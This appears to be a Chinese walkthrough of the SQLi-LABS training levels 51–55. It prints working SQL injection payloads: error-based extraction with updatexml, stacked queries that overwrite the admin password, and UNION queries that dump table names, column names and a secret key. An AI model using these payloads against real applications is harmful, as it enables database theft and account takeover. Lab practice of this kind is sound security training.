当前位置: 首页 > article >正文

SQLi-LABS通关攻略【51-55关】

article 2024/11/14 19:59:20

SQLi-LABS 51关

51关和50关一样,只是改为了单引号闭合

依旧有报错信息,可以使用报错注入

构造payload,得到数据库名

?sort=1' and updatexml(1,concat(1,database()),1)--+

SQLi-LABS 52关

52关和50关一样,但是没有报错信息,所以报错注入的方式行不通

可以使用堆叠注入或者时间盲注

这里使用堆叠注入

构造payload更改admin的密码,测试堆叠注入是否可行

?sort=1;update users set password='777' where username='admin'--+

修改成功,存在堆叠注入

SQLi-LABS 53关

53关和52关一样,同样是没有报错信息,但是是字符型,使用单引号闭合

构造payload更改admin的密码为444

?sort=1';update users set password='444' where username='admin'--+

 更改成功,存在堆叠注入

SQLi-LABS 54关

本关是全新的模式

这一关就是让我们在十次的查询次数内找到secret key

如果超过十次没有结果,那就会重置本关

我们直接测试闭合方式,是字符型,单引号闭合

因为题目中指定了数据库'challenges'

接下来直接使用联合注入进行表名查询

?id=-1'union select 1,2,table_name from information_schema.tables where table_schema=database()--+

得到表明是这个 p7bqnwkvaj

接下来查询字段

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='p7bqnwkvaj'--+

最后直接查询secret_VO6I字段

?id=-1'union select 1,2,secret_VO6I from p7bqnwkvaj--+

将得到key提交就算过关了

SQLi-LABS 55关

55关和54关一样,只是查询次数改为14次,闭合方式改为数字型括号闭合

题目依旧指定了数据库名是'challenges'

所以我们直接查表名

?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 得到表明是250xkt025w

接下来查字段

?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='250xkt025w'--+

查询secret_DMQK字段

?id=-1) union select 1,2,secret_DMQK from 250xkt025w --+

得到key后直接提交就可以通关了


http://www.kler.cn/a/284211.html

相关文章:

  • UVC 输出视频格式修改和windows下数据分析
  • JSON-RPC-CXX深度解析:C++中的远程调用利器
  • 读数据质量管理:数据可靠性与数据质量问题解决之道03数据目录
  • 数据结构与算法-前缀和数组
  • Mit6.S081-实验环境搭建
  • 超市里的货物架调整(算法解析)|豆包MarsCode AI刷题
  • 使用SparkGraphX进行图计算时的编码问题
  • 用Python在PDF文档中创建动作
  • OpenCV+Python识别机读卡
  • python从列表元素中查找最小的元组坐标
  • Vue——认识day05_监视属性
  • 安装jmeter的梯度压测线程组(Custom Thread Groups)的插件
  • 10款必备的电脑监控软件推荐,实用又方便!顶尖产品一网打尽!2024纯干货
  • 【JAVA入门】Day28 - 数据结构
  • JavaScript 中,不同的赋值方式适用场景
  • OpenAI“草莓项目”最快今年秋季发布!苹果将于9月10号推出首款AI iPhone|AI日报
  • C/C++ 编译过程概述
  • 睡岗检测数据集(工作 课堂等) 3100张 增强 睡岗趴睡 带标注 voc yolo
  • Springboot3整合ELK实现日志可视化
  • Spring Boot中Tomcat、Jetty、Undertow哪个嵌入式服务器最好?
  • 线性代数基础
  • 实训day29(8.15)
  • 探索未知,悦享惊喜 —— 您的专属盲盒小程序,即将开启奇妙之旅
  • Qt窗口 菜单栏 QMenuBar和的使用及说明
  • 全局页面数据渲染--SAAS本地化及未来之窗行业应用跨平台架构
  • 手机二要素api接口是什么?怎么对接使用?